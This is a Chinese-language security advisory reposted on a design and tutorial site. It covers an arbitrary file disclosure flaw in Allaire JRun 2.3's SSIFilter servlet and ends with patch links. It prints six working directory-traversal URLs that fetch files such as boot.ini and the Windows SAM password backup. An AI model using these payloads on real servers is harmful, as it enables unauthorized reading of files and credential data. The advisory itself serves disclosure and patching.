|
![]() |
名片设计 CorelDRAW Illustrator AuotoCAD Painter 其他软件 Photoshop Fireworks Flash |
|
涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 具体: Allaire 的 JRUN 服务器 2.3上存在多重显示代码漏洞。该漏洞答应攻击者在 WEB 服务器上查看根目录下的任意文件的源代码。 JRun 2.3 使用 Java Servlets 解析各种各样类型的页面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件设置,可能利用URL前缀"/servlet/"调用任何servlet。 它可能使用 Jrun 的 SSIFilter servlet 在目标系统上检索任意的文件。下列 2 个例子显示出能被用来检索任意的文件的 URLs : http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t est.jsp http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. ./../../../../boot.ini http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. ./../../../../winnt/repair/sam._ http://jrun:8000/servlet/ssifilter/../../test.jsp http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._ 注重:假设JRun在主机“ jrun ”上运行,端口8000。 受影响的系统: Allaire JRun 2.3.x 解决方案: 下载并安装补丁: Allaire patch jr233p_ASB00_28_29 http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip Windows 95/98/NT/2000 and Windows NT Alpha Allaire patch jr233p_ASB00_28_29tar http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz UNIX/Linux patch - GNU gzip/tar 返回类别: 教程 上一教程: 详解如何利用iText在JSP中生成PDF报表 下一教程: J2EE初学者需要理解的问题 您可以阅读与"Allaire JRUN 2.3 查看任意文件漏洞"相关的教程: · Apache泄露重写的任意文件漏洞 · Allaire JRUN 2.3远程执行任意命令漏洞 · Allair JRUN 非法读取 WEB-INF 漏洞 · JRun 2.3.x 范例文件暴露站点安全信息 · JSP中任意文字转UNICODE的通用模块 |
![]() ![]() |
快精灵印艺坊 版权所有 |
首页![]() ![]() ![]() ![]() ![]() ![]() ![]() |